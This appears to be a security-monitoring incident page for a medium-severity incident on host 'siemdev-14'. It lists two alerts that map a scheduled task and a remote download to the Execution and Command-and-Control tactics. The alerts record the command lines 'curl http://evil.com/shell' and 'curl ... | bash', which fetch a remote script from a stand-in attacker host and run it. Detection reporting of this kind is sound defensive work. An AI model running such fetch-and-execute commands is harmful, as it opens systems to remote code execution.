Back to list

Medium CINC-20251220-EC0104B2 new

Aggregate ID: aggind:021368f9220b45cdb2760a069897c1c8:17552396210

Incident Overview

Incident ID CINC-20251220-EC0104B2
Severity Medium (70)
Status new
Alert Count 2
Host Count 1

Timeline

First Seen 2025-12-14 02:01:05
Last Seen 2025-12-14 02:01:05
Duration 0d 0h 0m
Created 2025-12-20 13:23
Updated 2026-01-13 15:14

Kill Chain Analysis

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...
Observed Tactics:
Execution Command and Control
Techniques:
Scheduled Task/Job Ingress Tool Transfer

Affected Hosts (1)

siemdev-14

Related Alerts (2)

Severity Status Hostname Description Tactic Command Line Time
High new siemdev-14 A scheduled task/job has been executed on your host. This could be used by an attacker to execute programs at system startup, or on a scheduled basis for persistence. Please check the process tree to determine if executed commands are malicious or if this was expected behavior. Execution curl http://evil.com/shell 12-14 02:01
High new siemdev-14 An attempt to download malicious files from the command-line interface has been detected on your host. Adversaries might use curl or wget to download additional payloads in case of compromise. Please review the event to determine if malicious files were downloaded or if this access was expected. Command and Control /bin/sh -c curl http://evil.com/shell|bash 12-14 02:01